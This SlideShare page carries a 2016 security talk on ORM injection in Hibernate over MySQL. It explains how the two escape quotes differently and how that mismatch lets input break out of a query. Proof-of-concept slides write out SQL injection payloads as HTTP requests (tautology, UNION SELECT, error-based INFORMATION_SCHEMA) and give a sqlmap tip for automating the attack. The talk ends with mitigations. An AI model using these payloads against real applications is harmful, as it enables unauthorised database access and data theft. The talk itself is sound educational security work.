Simone Onofri, profile picture
Uploaded bySimone Onofri
11,510 views

ORM Injection

This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.

Embed presentation

ORM Injection Donato Onofri Simone Onofri September 03, 2016
Agenda - Injection - ORM - ORM Injection - ORM Injection in Hibernate with mySql - Proof of Concept - Conclusions 2
Injection Vulnerabilities 3
Injection The first vulnerability of OWASP TOP 10 2013 4 https://www.owasp.org/index.php/Top_10_2013-A1-Injection Injection Definition Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.” Exploitability - EASY Prevalence - COMMON Detectability - AVERAGE Impact - SEVERE How do I prevent? Keeping untrusted data separate from command and queries: a) Safe API (parametrized, pay attention to stored procedures); b) Escape special characters (e.g. ESAPI); Positive whitelist.
Object Relational Mapping 5
Object Relational Mapping What is ORM? 6 Objection Relational Mapping (ORM) is a programming technique that manages data persistence and allows integration between relational databases and software architectures based on object-oriented paradigm. PROS – Open Source, “Domain Model” pattern, Increased development speed & reduced code, Portability, Performance, Concurrency & multiple-tenancy, Scalable, Extendible, etc… EXAMPLES – Hibernate (Java); Propel (PHP); Nhibernate (.NET) Web Server / Application Server Database Server ORM Domain Model Object
Object Relational Mapping 2001 2003 2005 2011 2015 Hibernate4 Released with multi tenancy, Session Factory… Hibernate5 Released with improved bootstrapping, java8… Hibernate3 Released with key features. Developers hired by JBoss Hibernate2 Released with significant improvements Started By Gavin King (Cirrus Technologies) as an alternative to using EJB2 7 An hibernation story: the ORM for Java Between Java and Persistance mapping from Java classes to database tables. CRUD Operations Declarative model «automation by annotation». Custom batching Usable with Hibernate Query Languages.
Object Relational Mapping What is Hibernate? 8 https://docs.jboss.org/hibernate/orm/5.1/userguide/html_single/Hibernate_User_Guide.html Hibernate’s design goal is to relieve the developer from 95% of common data persistence-related programming tasks by eliminating the need for manual, hand-crafted data processing using SQL and JDBC However, unlike many other persistence solutions, Hibernate does not hide the power of SQL from you and guarantees that your investment in relational technology and knowledge is as valid as always. Hibernate uses a powerful query language (HQL) that is similar in appearance to SQL, but fully object-oriented. HQL queries are translated by Hibernate into conventional SQL queries which in turns perform action on database. Hibernate Database User Input!http://example.com/ search?place=dagobah HQL Query searching for dagobah SQL Query searching for dagobah Presentation Layer Business Logic Layer Data Access Layer JDBC Java Persistence API Hibernate Native API
ORM 101: Object Relational Mapping Hibernate Query Language Cheatsheet 9 Syntax • With the exception of names of Java classes and properties, queries are case-insensitive. • Clauses: • SELECT, UPDATE, DELETE, INSERT, WHERE, JOIN, ORDER BY, GROUP BY, AS • Aggregate functions: • COUNT, AVG, MIN, MAX, SUM • Expressions: • CASE {operand} WHEN {test_value} THEN {match_result} ELSE {miss_result} END • Polymorphic NOTE: is pretty limited against Relational Database Management Systems
ORM 101: Object Relational Mapping Hibernate Query Language Cheatsheet 10 Data Types • Numeric • Boolean • DateTime • Strings • Encoded in single-quotes. To escape a single-quote (‘) within a string literal, use double single- quotes (‘’). • E.g.: // Escaping quotes – Search “Joe’s” List<Person> persons = entityManager.createQuery( "select p “ + "from Person p " + "where p.name like 'Joe''s'", Person.class) .getResultList(); // Not Escaping quotes - Search “Joe” List<Person> persons = entityManager.createQuery( "select p " + "from Person p " + "where p.name like 'Joe'", Person.class) .getResultList();
ORM Injection 11
ORM Injection By official definition from CAPEC-109: ORM Injection 12 http://capec.mitre.org/data/definitions/109.html Definition An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible. How do I prevent? Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework Ensure to keep up to date with security relevant updates to the persistence framework used within your application. Attack Prerequisites • An application uses data access layer generated by an ORM tool or framework • An application uses user supplied data in queries executed against the database • The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework
ORM Injection What is possible to do? 13 –As stated in Injection definition we have to modify the «meaning» of the original request (query) to the interpreter to receive arbitrary data. –With ORM, we have two intepreters: – ORM itself (in our case Hibernate) – SQL database (in our case a MySql) – What to Inject: – ORM: less possibility because of limited functionalities of HQL – SQL: more possibility because of the power of the database used by ORM Hibernate Database User Input! Presentation Layer Business Logic Layer Data Access Layer JDBC Java Persistence API Hibernate Native API
ORM Injection in Hibernate 14
Over ORM/HQL Injection Breaking the syntax 15 • Recall: • Hibernate can use HQL as a layer over SQL • Hibernate escapes char ‘ with ‘‘ • Relational Database may (rather: very often ) use different escaping rules • E.G. MySQL Database escapes char ‘ with ’ • Cons: • Chars (or strings) with specific semantic in HQL sintax can have different semantic in SQL: char is a simple char in HQL!
Let’s generalize – Mysql – Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string] – MySQL – ‘abc’’or 1=(select 1)--’ 16http://2015.zeronights.org/assets/files/36-Egorov-Soldatov.pdf – Postgresql – ’’ not working, quote escaping with ‘’ only – HQL allows subqueries in where clause – Hibernate allow arbitrary function names in HQL – Postgresql have query_to_xml(‘SQL’) – Oracle – ’’ not working, quote escaping with ‘’ only – Hibernate allow arbitrary function names in HQL – Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’) – MSSQL – ’’ not working, quote escaping with ‘’ only – No usable XML function – Hibernate ORM allows Unicode symbols – MS SQL Server allows Unicode delimiters in query – Using UTF-8 delimiters with U+00A0
Back to the Hibernate and mySql From input to Database 17 SELECT person0_.id as id1_, person0_.name as name1_, person0_.age as age_1, FROM app1.person person0_ WHERE person0_.name LIKE '%Yoda%' User Input HQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda%’ http://www.example.com/app/?person=Yoda (my)SQL Query
Over ORM/HQL Injection A question of escaping 18 HQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda’’ UNION SELECT version(),1,1-- %’ ’’ Chars ’ are considered ’ by HQL ( is normal for HQL), but ’ (escaped quote) by mySql Chars ’’ are considered ’escaped char by HQL and an ’’ in mySql
Over ORM/HQL Injection SQL Injection via HQL Injection 19 SELECT person0_.id as id1_, person0_.name as name1_, person0_.age as age_1, FROM app1.person person0_ WHERE person0_.name LIKE ‘%Yoda’’UNION SELECT version(),1,1-- %’ User Input HQL Query (my)SQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda ’’ UNION SELECT version(),1,1-- %’ http://www.example.com/app/?person=Yoda ’’ UNION SELECT version(),1,1--
Proof of Concept ORM Injection with Hibernate and mySql 20
Proof of Concept Requirements 21 •Hibernate •HQL Query •MySQL Database •Unsafe Application 
Proof of Concept Let’s start 22 GET /app/planets/search?place=dagobah&page=1 HTTP/1.1 HTTP Request { places: [ {“name1” : “hello1”,place: “dagobah”, placeCode: “123”, “CF”: “243436”}, {“name2” : “hello2”,place: “dagobah”, placeCode: “1234”, “CF”: “243465”}, {“name3” : “hello3”,place: “dagobah”, placeCode: “12345”, “CF”: “265434”} ] } HTTP Response 200 OK (JSON)
«All you need is love quote…» Beatels on Injection vulnerabilities 23
Proof of Concept Breaking HQL Query 24 GET /app/planets/search?place=dagobah’&page=1 HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (Hibernate QueryException)
Proof of Concept Not Breaking HQL – Correct escape in HQL 25 GET /app/planets/search?place=dagobah’’&page=1 HTTP/1.1 HTTP Request HTTP Response 200 OK (JSON) places: [ {“name1”: “hello1”,place: “dagobah”, placeCode: “139439439349”, “destroyed”: “no”}, {“name2”: “hello2”,place: “dagobah’s”, placeCode: “139439439349”, “destroyed”: “no”}, ]
Proof of Concept Injecting HQL in order to«selecting all» (take care it is dangerous) 26 GET /app/planets/search?place=dagobah' or '1' = '1&page=1 HTTP/1.1 HTTP Request HTTP Response 200 OK (JSON) { places: [ {“name1”: “hello1”,place: “dagobah”, placeCode: “139439439349”, “destroyed”: “no”}, {“name2”: “hello2”,place: “tatooine”, placeCode: “139439439347”, “destroyed”: “no”}, {“name3”: “hello3”,place: “alderaan”, placeCode: “139439439360”, “destroyed”: “yes”}, {“name4” :“hello4”,null, null, “destroyed”: null}, {“name5”: “hello5”, place: “hot”, placeCode: “73439439360”, “destroyed”: “no”} ] }
Proof of Concept Breaking SQL Query 27 GET /app/planets/search?place=dagobah’’&page=1 HTTP/1.1 Different from previous one! SQLGrammarException != Hibernate QueryException HTTP Request HTTP Response 500 Internal Server Error (SQLGrammarException)
Proof of Concept Breaking SQL Query (cont’d) 28 GET /app/planets/search=place=dagobah’’&page=1 HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (MySQLSyntaxException)
29
30
Proof of Concept Bad Request – SQL Injection over HQL Injection (using valid SQL) 31 GET / app/planets/search=place=dagobah'' AND (SELECT 8164 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(8164=8164,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--wNyk&page=1HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (MySQLIntegrityContstraintViolationException)
Over ORM/HQL Injection Automate Injection on Hibernate/mySql 32 Automation is fun, to exploit «automagically» and mySql in inside use the --prefix switch of sqlmap with the value of a correct HSQL query but wrong mySql query, e.g. dagobah’’
Conclusions 33
Conclusion Lesson learned 34 Depends from the DBMS under ORM Level (e.g. Escaping char «» has different meaning in PostgerSQL [see http://2015.zeronights.org/a ssets/files/36-Egorov- Soldatov.pdf] for further details) Enforce boundary controls on each application level (strict input validation, parametrized query) Think strategically! OGM Injection? ([see http://hibernate.org/ogm/] for further details) Impact Mitigation Future
«Never trust the user input, frameworks too...» Parameter manipulation motto (reloaded) 35
Over ORM/HQL Injection Wikipedia suggestions on SQL Injection mitigation 36 Wikipedia on Parametrized statements Mitigation With most development platforms, parameterized statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value. https://en.wikipedia.org/wiki/SQL_injection#Parameterized_statements Enforcement at the coding level Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in effect will generate parameterized SQL statements from object-oriented code.” Is it true?
Conclusions A «Toy» Story 37
Thank you 38

More Related Content

PPTX
Json Web Token - JWT
byPrashant Walke
 
PDF
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
Spring Framework - Spring Security
byDzmitry Naskou
 
PPTX
Sql Injection attacks and prevention
byhelloanand
 
PDF
Naver속도의, 속도에 의한, 속도를 위한 몽고DB (네이버 컨텐츠검색과 몽고DB) [Naver]
byMongoDB
 
PDF
Fundamental JavaScript [UTC, March 2014]
byAaron Gustafson
 
PDF
sqlmap internals
byMiroslav Stampar
 
Json Web Token - JWT
byPrashant Walke
 
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
Waf bypassing Techniques
byAvinash Thapa
 
Spring Framework - Spring Security
byDzmitry Naskou
 
Sql Injection attacks and prevention
byhelloanand
 
Naver속도의, 속도에 의한, 속도를 위한 몽고DB (네이버 컨텐츠검색과 몽고DB) [Naver]
byMongoDB
 
Fundamental JavaScript [UTC, March 2014]
byAaron Gustafson
 
sqlmap internals
byMiroslav Stampar
 

What's hot

PDF
Sql Injection Myths and Fallacies
byKarwin Software Solutions LLC
 
PPT
SQL Injection
byAdhoura Academy
 
PDF
Spring Framework - AOP
byDzmitry Naskou
 
PPT
Advanced SQL Injection
byamiable_indian
 
PDF
Jwt Security
bySeid Yassin
 
PDF
Airflow presentation
byIlias Okacha
 
PDF
jQuery for beginners
byArulmurugan Rajaraman
 
PDF
Introduction to ASP.NET Core
byAvanade Nederland
 
PPTX
Google Dorks
byAdhoura Academy
 
PDF
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
PDF
Testing with Spring: An Introduction
bySam Brannen
 
PPTX
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PPTX
HTML Fundamentals
byBG Java EE Course
 
PDF
스프링 시큐리티 구조 이해
bybeom kyun choi
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PPTX
Sql injection - security testing
byNapendra Singh
 
PDF
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
PPTX
jQuery
byDileep Mishra
 
Sql Injection Myths and Fallacies
byKarwin Software Solutions LLC
 
SQL Injection
byAdhoura Academy
 
Spring Framework - AOP
byDzmitry Naskou
 
Advanced SQL Injection
byamiable_indian
 
Jwt Security
bySeid Yassin
 
Airflow presentation
byIlias Okacha
 
jQuery for beginners
byArulmurugan Rajaraman
 
Introduction to ASP.NET Core
byAvanade Nederland
 
Google Dorks
byAdhoura Academy
 
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
Testing with Spring: An Introduction
bySam Brannen
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
HTML Fundamentals
byBG Java EE Course
 
스프링 시큐리티 구조 이해
bybeom kyun choi
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
Sql injection - security testing
byNapendra Singh
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
jQuery
byDileep Mishra
 

Viewers also liked

PDF
Expanding the control over the operating system from the database
byBernardo Damele A. G.
 
PDF
Object Oriented Exploitation: New techniques in Windows mitigation bypass
bySam Thomas
 
PPTX
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
byPeter Hlavaty
 
PPTX
Invoke-Obfuscation nullcon 2017
byDaniel Bohannon
 
PDF
Final lfh presentation (3)
by__x86
 
PDF
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
PDF
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
PPTX
How Safe is your Link ?
byPeter Hlavaty
 
PDF
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
bySimone Onofri
 
PDF
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...
bySimone Onofri
 
PDF
ISACA - Gestire progetti di Ethical Hacking secondo le best practices
bySimone Onofri
 
PPTX
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 Winter
bySimone Onofri
 
PDF
Meetmagento 2014 hackers_onofri
bySimone Onofri
 
PPTX
Security Project Management: Esperienze nella gestione di Vulnerability Asses...
bySimone Onofri
 
PDF
Introduzione ai network penetration test secondo osstmm
bySimone Onofri
 
PDF
IPMA 2014 World Congress - Stakeholder Engagement between Traditional and Ag...
bySimone Onofri
 
PDF
Penetration Testing con Python - Network Sniffer
bySimone Onofri
 
PDF
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
byCanSecWest
 
PDF
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
byCanSecWest
 
PDF
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
byCanSecWest
 
Expanding the control over the operating system from the database
byBernardo Damele A. G.
 
Object Oriented Exploitation: New techniques in Windows mitigation bypass
bySam Thomas
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
byPeter Hlavaty
 
Invoke-Obfuscation nullcon 2017
byDaniel Bohannon
 
Final lfh presentation (3)
by__x86
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
How Safe is your Link ?
byPeter Hlavaty
 
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
bySimone Onofri
 
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...
bySimone Onofri
 
ISACA - Gestire progetti di Ethical Hacking secondo le best practices
bySimone Onofri
 
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 Winter
bySimone Onofri
 
Meetmagento 2014 hackers_onofri
bySimone Onofri
 
Security Project Management: Esperienze nella gestione di Vulnerability Asses...
bySimone Onofri
 
Introduzione ai network penetration test secondo osstmm
bySimone Onofri
 
IPMA 2014 World Congress - Stakeholder Engagement between Traditional and Ag...
bySimone Onofri
 
Penetration Testing con Python - Network Sniffer
bySimone Onofri
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
byCanSecWest
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
byCanSecWest
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
byCanSecWest
 

Similar to ORM Injection

PDF
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
PPTX
Hibernate ppt
byAneega
 
PPT
Hibernate
byAjay K
 
PPTX
Hibernate
byMallikarjuna G D
 
PPTX
Mastering_Hibernate_Object_Relation_Mapping_ORM.pptx
byYahya NOUALI
 
PDF
Introduction to JPA and Hibernate including examples
byecosio GmbH
 
PPTX
Why haven't we stamped out SQL injection and XSS yet
byRomain Gaucher
 
PDF
ITB2017 - Slaying the ORM dragons with cborm
byOrtus Solutions, Corp
 
PDF
Hibernate In Action 1st Edition Christian Bauer Gavin King
bywydunkhi2731
 
PDF
inf5750---lecture-2.-c---hibernate-intro.pdf
bybhqckkgwglxjcuctdf
 
PDF
Evolution of database access technologies in Java-based software projects
byTom Mens
 
PDF
Webinar: Hibernate - the ultimate ORM framework
byEdureka!
 
PPTX
Module-3 for career and JFSD ppt for study.pptx
byViratKohli78
 
PDF
Free Hibernate Tutorial | VirtualNuggets
byVirtual Nuggets
 
PPTX
Hibernate
byPrashant Kalkar
 
PPTX
Hibernate tutorial
byMumbai Academisc
 
PPTX
The tortoise and the ORM
byFrikkie van Biljon
 
PDF
Hibernate in Action 1st Edition Christian Bauer
bysanosaasi
 
PPT
Hibernate Tutorial
byRam132
 
PDF
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
byOrtus Solutions, Corp
 
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
Hibernate ppt
byAneega
 
Hibernate
byAjay K
 
Hibernate
byMallikarjuna G D
 
Mastering_Hibernate_Object_Relation_Mapping_ORM.pptx
byYahya NOUALI
 
Introduction to JPA and Hibernate including examples
byecosio GmbH
 
Why haven't we stamped out SQL injection and XSS yet
byRomain Gaucher
 
ITB2017 - Slaying the ORM dragons with cborm
byOrtus Solutions, Corp
 
Hibernate In Action 1st Edition Christian Bauer Gavin King
bywydunkhi2731
 
inf5750---lecture-2.-c---hibernate-intro.pdf
bybhqckkgwglxjcuctdf
 
Evolution of database access technologies in Java-based software projects
byTom Mens
 
Webinar: Hibernate - the ultimate ORM framework
byEdureka!
 
Module-3 for career and JFSD ppt for study.pptx
byViratKohli78
 
Free Hibernate Tutorial | VirtualNuggets
byVirtual Nuggets
 
Hibernate
byPrashant Kalkar
 
Hibernate tutorial
byMumbai Academisc
 
The tortoise and the ORM
byFrikkie van Biljon
 
Hibernate in Action 1st Edition Christian Bauer
bysanosaasi
 
Hibernate Tutorial
byRam132
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
byOrtus Solutions, Corp
 

More from Simone Onofri

PDF
Threat Modeling Connect (TMC) Barcelona Meetup - Threat Modeling @ W3C - Age...
bySimone Onofri
 
PDF
Serverless Meetup Barcelona - Attacking and Exploiting Modern Web Applications
bySimone Onofri
 
PDF
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
bySimone Onofri
 
PDF
Attacking IoT Devices from a Web Perspective - Linux Day
bySimone Onofri
 
PDF
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deployment
bySimone Onofri
 
PDF
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
bySimone Onofri
 
PDF
Agile Lean Conference 2017 - Leadership e facilitazione
bySimone Onofri
 
PDF
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
bySimone Onofri
 
PDF
Agile Project Framework
bySimone Onofri
 
PDF
Agile nei servizi di cyber security (Security Summit Edition)
bySimone Onofri
 
PDF
Security Project Management - Agile nei servizi di Cyber Security
bySimone Onofri
 
PDF
Cyber Defense - How to find and manage zero-days
bySimone Onofri
 
PDF
Cyber Defense - How to be prepared to APT
bySimone Onofri
 
PDF
Agile e Lean Management
bySimone Onofri
 
PDF
Nuove minacce nella Cyber Security, come proteggersi
bySimone Onofri
 
PDF
Agile Lean Management - MoSCoW, Timeboxing e Kanban
bySimone Onofri
 
PDF
Agile lean conference - Agile, Lean & Business
bySimone Onofri
 
PDF
Hackers vs Developers - SQL Injection - Attacco e Difesa
bySimone Onofri
 
PDF
Lean Startup Machine - Rome - Agile e Lean Project Management
bySimone Onofri
 
PDF
ITSMF Conferenza 2014 - L'officina Agile per innovare l'IT Service Management
bySimone Onofri
 
Threat Modeling Connect (TMC) Barcelona Meetup - Threat Modeling @ W3C - Age...
bySimone Onofri
 
Serverless Meetup Barcelona - Attacking and Exploiting Modern Web Applications
bySimone Onofri
 
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
bySimone Onofri
 
Attacking IoT Devices from a Web Perspective - Linux Day
bySimone Onofri
 
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deployment
bySimone Onofri
 
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
bySimone Onofri
 
Agile Lean Conference 2017 - Leadership e facilitazione
bySimone Onofri
 
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
bySimone Onofri
 
Agile Project Framework
bySimone Onofri
 
Agile nei servizi di cyber security (Security Summit Edition)
bySimone Onofri
 
Security Project Management - Agile nei servizi di Cyber Security
bySimone Onofri
 
Cyber Defense - How to find and manage zero-days
bySimone Onofri
 
Cyber Defense - How to be prepared to APT
bySimone Onofri
 
Agile e Lean Management
bySimone Onofri
 
Nuove minacce nella Cyber Security, come proteggersi
bySimone Onofri
 
Agile Lean Management - MoSCoW, Timeboxing e Kanban
bySimone Onofri
 
Agile lean conference - Agile, Lean & Business
bySimone Onofri
 
Hackers vs Developers - SQL Injection - Attacco e Difesa
bySimone Onofri
 
Lean Startup Machine - Rome - Agile e Lean Project Management
bySimone Onofri
 
ITSMF Conferenza 2014 - L'officina Agile per innovare l'IT Service Management
bySimone Onofri
 

Recently uploaded

PDF
Think before you Click (Ligap Project) - SI Ebhonu at FGGC.pdf
bySylvester Ebhonu
 
PPTX
TOPFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.ppX
bycontactvidyawan
 
PDF
Trusted Phone Tracker App (2026)_ How to Choose a Legit, Secure, Consent-Base...
bySophia Clark
 
PDF
Openclaw Corporate Infrastructure at Risk.pdf
byGaneshShri2
 
PDF
AI Girlfriend Platforms Compared 2026 AI Angels Janitor AI Character AI Candy AI
byAi Angels
 
PDF
Darknet Master Tor and Deep Web Secrets (Procolo Scotto).pdf
bykuldeepbauddh1
 
PPTX
Mind Sound Resonance Technique (MSRT) Teacher Training Course.pptx
byKaruna Yoga Vidya Peetham
 
Think before you Click (Ligap Project) - SI Ebhonu at FGGC.pdf
bySylvester Ebhonu
 
TOPFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.ppX
bycontactvidyawan
 
Trusted Phone Tracker App (2026)_ How to Choose a Legit, Secure, Consent-Base...
bySophia Clark
 
Openclaw Corporate Infrastructure at Risk.pdf
byGaneshShri2
 
AI Girlfriend Platforms Compared 2026 AI Angels Janitor AI Character AI Candy AI
byAi Angels
 
Darknet Master Tor and Deep Web Secrets (Procolo Scotto).pdf
bykuldeepbauddh1
 
Mind Sound Resonance Technique (MSRT) Teacher Training Course.pptx
byKaruna Yoga Vidya Peetham
 

ORM Injection

  • 1.
    ORM Injection Donato Onofri SimoneOnofri September 03, 2016
  • 2.
    Agenda - Injection - ORM -ORM Injection - ORM Injection in Hibernate with mySql - Proof of Concept - Conclusions 2
  • 3.
  • 4.
    Injection The first vulnerabilityof OWASP TOP 10 2013 4 https://www.owasp.org/index.php/Top_10_2013-A1-Injection Injection Definition Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.” Exploitability - EASY Prevalence - COMMON Detectability - AVERAGE Impact - SEVERE How do I prevent? Keeping untrusted data separate from command and queries: a) Safe API (parametrized, pay attention to stored procedures); b) Escape special characters (e.g. ESAPI); Positive whitelist.
  • 5.
  • 6.
    Object Relational Mapping Whatis ORM? 6 Objection Relational Mapping (ORM) is a programming technique that manages data persistence and allows integration between relational databases and software architectures based on object-oriented paradigm. PROS – Open Source, “Domain Model” pattern, Increased development speed & reduced code, Portability, Performance, Concurrency & multiple-tenancy, Scalable, Extendible, etc… EXAMPLES – Hibernate (Java); Propel (PHP); Nhibernate (.NET) Web Server / Application Server Database Server ORM Domain Model Object
  • 7.
    Object Relational Mapping 20012003 2005 2011 2015 Hibernate4 Released with multi tenancy, Session Factory… Hibernate5 Released with improved bootstrapping, java8… Hibernate3 Released with key features. Developers hired by JBoss Hibernate2 Released with significant improvements Started By Gavin King (Cirrus Technologies) as an alternative to using EJB2 7 An hibernation story: the ORM for Java Between Java and Persistance mapping from Java classes to database tables. CRUD Operations Declarative model «automation by annotation». Custom batching Usable with Hibernate Query Languages.
  • 8.
    Object Relational Mapping Whatis Hibernate? 8 https://docs.jboss.org/hibernate/orm/5.1/userguide/html_single/Hibernate_User_Guide.html Hibernate’s design goal is to relieve the developer from 95% of common data persistence-related programming tasks by eliminating the need for manual, hand-crafted data processing using SQL and JDBC However, unlike many other persistence solutions, Hibernate does not hide the power of SQL from you and guarantees that your investment in relational technology and knowledge is as valid as always. Hibernate uses a powerful query language (HQL) that is similar in appearance to SQL, but fully object-oriented. HQL queries are translated by Hibernate into conventional SQL queries which in turns perform action on database. Hibernate Database User Input!http://example.com/ search?place=dagobah HQL Query searching for dagobah SQL Query searching for dagobah Presentation Layer Business Logic Layer Data Access Layer JDBC Java Persistence API Hibernate Native API
  • 9.
    ORM 101: ObjectRelational Mapping Hibernate Query Language Cheatsheet 9 Syntax • With the exception of names of Java classes and properties, queries are case-insensitive. • Clauses: • SELECT, UPDATE, DELETE, INSERT, WHERE, JOIN, ORDER BY, GROUP BY, AS • Aggregate functions: • COUNT, AVG, MIN, MAX, SUM • Expressions: • CASE {operand} WHEN {test_value} THEN {match_result} ELSE {miss_result} END • Polymorphic NOTE: is pretty limited against Relational Database Management Systems
  • 10.
    ORM 101: ObjectRelational Mapping Hibernate Query Language Cheatsheet 10 Data Types • Numeric • Boolean • DateTime • Strings • Encoded in single-quotes. To escape a single-quote (‘) within a string literal, use double single- quotes (‘’). • E.g.: // Escaping quotes – Search “Joe’s” List<Person> persons = entityManager.createQuery( "select p “ + "from Person p " + "where p.name like 'Joe''s'", Person.class) .getResultList(); // Not Escaping quotes - Search “Joe” List<Person> persons = entityManager.createQuery( "select p " + "from Person p " + "where p.name like 'Joe'", Person.class) .getResultList();
  • 11.
  • 12.
    ORM Injection By officialdefinition from CAPEC-109: ORM Injection 12 http://capec.mitre.org/data/definitions/109.html Definition An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible. How do I prevent? Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework Ensure to keep up to date with security relevant updates to the persistence framework used within your application. Attack Prerequisites • An application uses data access layer generated by an ORM tool or framework • An application uses user supplied data in queries executed against the database • The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework
  • 13.
    ORM Injection What ispossible to do? 13 –As stated in Injection definition we have to modify the «meaning» of the original request (query) to the interpreter to receive arbitrary data. –With ORM, we have two intepreters: – ORM itself (in our case Hibernate) – SQL database (in our case a MySql) – What to Inject: – ORM: less possibility because of limited functionalities of HQL – SQL: more possibility because of the power of the database used by ORM Hibernate Database User Input! Presentation Layer Business Logic Layer Data Access Layer JDBC Java Persistence API Hibernate Native API
  • 14.
    ORM Injection inHibernate 14
  • 15.
